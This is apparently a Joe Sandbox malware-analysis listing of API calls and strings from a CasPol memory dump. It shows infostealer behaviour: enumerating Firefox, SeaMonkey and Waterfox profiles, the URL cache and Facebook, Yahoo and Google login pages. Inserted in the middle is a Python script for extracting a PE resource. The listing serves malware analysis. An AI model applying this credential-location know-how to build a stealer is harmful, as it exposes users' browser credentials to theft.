                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                          • API String ID: 2804212203-2982631422
                                                                                                                                                                          • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                          • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                          • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 115830560-3916222277
                                                                                                                                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                          • free.MSVCRT ref: 0041848B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                          • String ID: |A
                                                                                                                                                                          • API String ID: 77810686-1717621600
                                                                                                                                                                          • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                          • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
• Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
• Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
• Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
• Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: r!A
• API String ID: 2791114272-628097481
• Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
• Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
• Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
• Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

Control-flow Graph
APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
• wcslen.MSVCRT ref: 0040C82C
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
• API String ID: 2936932814-4196376884
• Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
• Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
• FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
• String ID: BIN
• API String ID: 1668488027-1015027815
• Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
• Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
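The function above resolves its own module (GetModuleHandleW(NULL)), calls FindResourceW(NULL, MAKEINTRESOURCE(0x32), L"BIN"), i.e. resource name 50 of the custom type "BIN", and copies the locked resource bytes out with memcpy. The memory dump this listing comes from is image-mapped (Offset 00400000, "based on PE: true"), so RVAs in it are file offsets. The following added Python example, written for this page and not code from Joe Sandbox or from the sample, pulls that resource out of either a PE on disk or such a dump with the standard library only. The embedded PE is constructed for the demo, and the contents of the BIN blob are not described on this page, so the example stops at extraction.

```python
"""Added example: extract resource type "BIN" / name 50 (the FindResourceW call at
0x40B5B6) from a PE file or an image-mapped memory dump. Standard library only."""
import struct

RESOURCE_TABLE = 2                                      # IMAGE_DIRECTORY_ENTRY_RESOURCE
_u16 = lambda b, o: struct.unpack_from("<H", b, o)[0]
_u32 = lambda b, o: struct.unpack_from("<I", b, o)[0]
# Resource names compare case-insensitively; MAKEINTRESOURCE ids compare as integers.
_same = lambda k, w: k.upper() == w.upper() if isinstance(k, str) and isinstance(w, str) else k == w

def _pe_off(pe):
    off = _u32(pe, 0x3C)                                # e_lfanew
    if pe[off:off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    return off

def _resource_table(pe):
    """(rva, size) of the resource directory from the optional header's data directory."""
    opt = _pe_off(pe) + 24
    dd = opt + (96 if _u16(pe, opt) == 0x10B else 112)  # PE32 vs PE32+ layout
    return _u32(pe, dd + 8 * RESOURCE_TABLE), _u32(pe, dd + 8 * RESOURCE_TABLE + 4)

def _rva_to_off(pe, rva, mapped):
    if mapped:                                          # dumped image: RVA == offset
        return rva
    p = _pe_off(pe)
    first = p + 24 + _u16(pe, p + 20)                   # section table follows the optional header
    for i in range(_u16(pe, p + 6)):
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", pe, first + 40 * i + 8)
        if va <= rva < va + max(vsize, rawsize):
            return rawptr + (rva - va)
    raise ValueError("RVA 0x%x is outside every section" % rva)

def _entries(pe, base, rel):
    """Entries of one IMAGE_RESOURCE_DIRECTORY as (key, child_rel, child_is_dir)."""
    d = base + rel
    out = []
    for i in range(_u16(pe, d + 12) + _u16(pe, d + 14)):   # named entries + id entries
        name, child = struct.unpack_from("<II", pe, d + 16 + 8 * i)
        if name & 0x80000000:                           # IMAGE_RESOURCE_DIR_STRING_U
            s = base + (name & 0x7FFFFFFF)
            key = pe[s + 2:s + 2 + 2 * _u16(pe, s)].decode("utf-16-le")
        else:
            key = name                                  # integer id
        out.append((key, child & 0x7FFFFFFF, bool(child & 0x80000000)))
    return out

def find_resource(pe, rtype, rname, mapped=False):
    """Walk type -> name -> language; return (data_rva, size) of the first language, or None."""
    rsrc_rva, rsrc_size = _resource_table(pe)
    if rsrc_size == 0:
        return None
    base = _rva_to_off(pe, rsrc_rva, mapped)
    rel = 0
    for want in (rtype, rname):
        hits = [c for k, c, is_dir in _entries(pe, base, rel) if is_dir and _same(k, want)]
        if not hits:
            return None
        rel = hits[0]
    leaves = [c for _, c, is_dir in _entries(pe, base, rel) if not is_dir]
    if not leaves:
        return None
    de = base + leaves[0]                               # IMAGE_RESOURCE_DATA_ENTRY
    return _u32(pe, de), _u32(pe, de + 4)               # OffsetToData is an RVA, not a file offset

def extract_resource(pe, rtype, rname, mapped=False):
    hit = find_resource(pe, rtype, rname, mapped)
    if hit is None:
        return None
    off = _rva_to_off(pe, hit[0], mapped)
    return bytes(pe[off:off + hit[1]])

SAMPLE_PAYLOAD = b"constructed sample resource payload"

def build_sample_pe(mapped=False):
    """Constructed minimal PE32 with one .rsrc section holding type BIN / name 50 / lang 0x409."""
    rsrc_rva, raw_ptr = 0x2000, (0x2000 if mapped else 0x200)
    rdir = lambda named, ids: struct.pack("<IIHHHH", 0, 0, 0, 0, named, ids)
    ent = lambda name, off, sub: struct.pack("<II", name, off | (0x80000000 if sub else 0))
    rsrc = (rdir(1, 0) + ent(0x80000000 | 0x58, 0x18, True)          # type "BIN" (string at 0x58)
            + rdir(0, 1) + ent(50, 0x30, True)                        # name 50
            + rdir(0, 1) + ent(0x409, 0x48, False)                    # language 0x409 -> data entry
            + struct.pack("<IIII", rsrc_rva + 0x60, len(SAMPLE_PAYLOAD), 0, 0)
            + struct.pack("<H", 3) + "BIN".encode("utf-16-le")
            + SAMPLE_PAYLOAD)
    opt = bytearray(0xE0)                                             # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 92, 16)                               # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * RESOURCE_TABLE, rsrc_rva, len(rsrc))
    hdr = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)              # e_lfanew = 0x40
           + b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
           + bytes(opt)
           + b".rsrc\0\0\0" + struct.pack("<IIII", len(rsrc), rsrc_rva, len(rsrc), raw_ptr) + b"\0" * 16)
    return hdr + b"\0" * (raw_ptr - len(hdr)) + rsrc
```

For the dump listed above, read the .sdmp and call extract_resource(data, "BIN", 50, mapped=True); for a dropped PE on disk use mapped=False so RVAs go through the section table. Only the first language entry is returned, which is what FindResourceW does with a NULL language, and a dump taken mid-unpacking can carry a truncated resource section, in which case find_resource returns None rather than a partial blob.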
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                          • API String ID: 4039892925-11920434
                                                                                                                                                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                          • API String ID: 4039892925-2068335096
                                                                                                                                                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
APIs
• memset.MSVCRT ref: 00403FE1
• memset.MSVCRT ref: 00403FF6
• memset.MSVCRT ref: 0040400B
• memset.MSVCRT ref: 00404020
• memset.MSVCRT ref: 00404035
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 004040FC
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• API String ID: 4039892925-3369679110
• Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
• Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
• Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
• Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
APIs
• memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
• Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
• Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 004033B7
• memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
• wcscmp.MSVCRT ref: 004033FC
• _wcsicmp.MSVCRT ref: 00403439
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
• String ID: $0.@
• API String ID: 2758756878-1896041820
• Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
• Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
• Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
• Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 2941347001-0
• Opcode ID: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
• Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
• Opcode Fuzzy Hash: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
